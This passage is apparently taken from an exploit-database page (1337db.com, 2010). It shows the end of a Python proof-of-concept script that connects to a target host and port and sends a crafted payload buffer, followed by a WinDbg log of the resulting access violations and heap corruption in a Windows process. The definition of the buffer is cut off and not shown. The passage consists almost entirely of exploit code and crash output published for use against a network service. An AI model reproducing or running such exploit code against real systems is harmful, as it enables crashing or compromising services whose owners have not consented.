    HOST = sys.argv[1]
    PORT = int(sys.argv[2])
    s.connect((HOST,PORT))
    data = s.recv(1024)
    print data
    print &quot;[*] Sending Payload...
&quot;
    s.send(buf+&#039;
&#039;)
    print &quot;[*] Closing Socket...
&quot;
    s.close()
 
if __name__ == &quot;__main__&quot;:
    main()
 
 
------------------------------------------------------------------------------
ModLoad: 75500000 75516000   C:Windowssystem32CRYPTSP.dll
ModLoad: 752a0000 752db000   C:Windowssystem32
saenh.dll
ModLoad: 72090000 720be000   C:Windowssystem32mlang.dll
ModLoad: 75090000 7509b000   C:Windowssystem32pcwum.DLL
ModLoad: 75a70000 75a7e000   C:Windowssystem32RpcRtRemote.dll
(22c.c10): Break instruction exception - code 80000003 (first chance)
eax=7ffaf000 ebx=00000000 ecx=00000000 edx=779cd315 esi=00000000 edi=00000000
eip=77963574 esp=00ccfc38 ebp=00ccfc64 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:WindowsSYSTEM32
tdll.dll -
ntdll!DbgBreakPoint:
77963574 cc              int     3
0:012&gt; g
(22c.31c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0000003c ecx=0050291c edx=0000003b esi=005e5fc0 edi=00500000
eip=77986167 esp=00abf6b4 ebp=00abf794 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
ntdll!RtlPrefixUnicodeString+0x84c:
77986167 8b4814          mov     ecx,dword ptr [eax+14h] ds:0023:00000014=????????
0:006&gt; g
(22c.31c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=005e5fc8 ebx=005e7fc8 ecx=b083ef27 edx=efb083ef esi=005e5fc0 edi=00500000
eip=77986030 esp=00abf674 ebp=00abf69c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
ntdll!RtlPrefixUnicodeString+0x715:
77986030 8b4904          mov     ecx,dword ptr [ecx+4] ds:0023:b083ef2b=????????
0:006&gt; g
Critical error detected c0000374
(22c.31c): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=77950805 edx=00abe7a9 esi=00500000 edi=00515520
eip=779f28e5 esp=00abe9fc ebp=00abea74 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
ntdll!RtlpNtMakeTemporaryKey+0x1a49:
779f28e5 cc              int     3
0:006&gt; g
(22c.31c): Unknown exception - code c0000374 (first chance)
(22c.31c): Unknown exception - code c0000374 (!!! second chance !!!)
eax=00abea0c ebx=00000000 ecx=77950805 edx=00abe7a9 esi=00500000 edi=00515520
eip=779f2913 esp=00abe9fc ebp=00abea74 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!RtlpNtMakeTemporaryKey+0x1a77:
779f2913 eb12            jmp     ntdll!RtlpNtMakeTemporaryKey+0x1a8b (779f2927)
0:006&gt; g
WARNING: Continuing a non-continuable exception
(22c.31c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0050299c ecx=00000011 edx=0000003b esi=00000000 edi=00000000
eip=7798c64e esp=00abf8a4 ebp=00abf974 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
ntdll!RtlTimeFieldsToTime+0x1d7:
7798c64e 8b4714          mov     eax,dword ptr [edi+14h] ds:0023:00000014=????????
0:006&gt; g
(22c.31c): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=0050299c ecx=00000011 edx=0000003b esi=00000000 edi=00000000
eip=7798c64e esp=00abf8a4 ebp=00abf974 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
ntdll!RtlTimeFieldsToTime+0x1d7:
7798c64e 8b4714          mov     eax,dword ptr [edi+14h] ds:0023:00000014=????????
0:006&gt; g
(22c.31c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0050299c ecx=00000011 edx=0000003b esi=00000000 edi=00000000
eip=7798c64e esp=00abf8a4 ebp=00abf974 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
ntdll!RtlTimeFieldsToTime+0x1d7:
7798c64e 8b4714          mov     eax,dword ptr [edi+14h] ds:0023:00000014=????????
0:006&gt; g
(22c.31c): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=0050299c ecx=00000011 edx=0000003b esi=00000000 edi=00000000
eip=7798c64e esp=00abf8a4 ebp=00abf974 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
ntdll!RtlTimeFieldsToTime+0x1d7:
7798c64e 8b4714          mov     eax,dword ptr [edi+14h] ds:0023:00000014=????????


# <a href='http://1337db.com/'>1337db.com</a> [2010-12-21]</pre></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20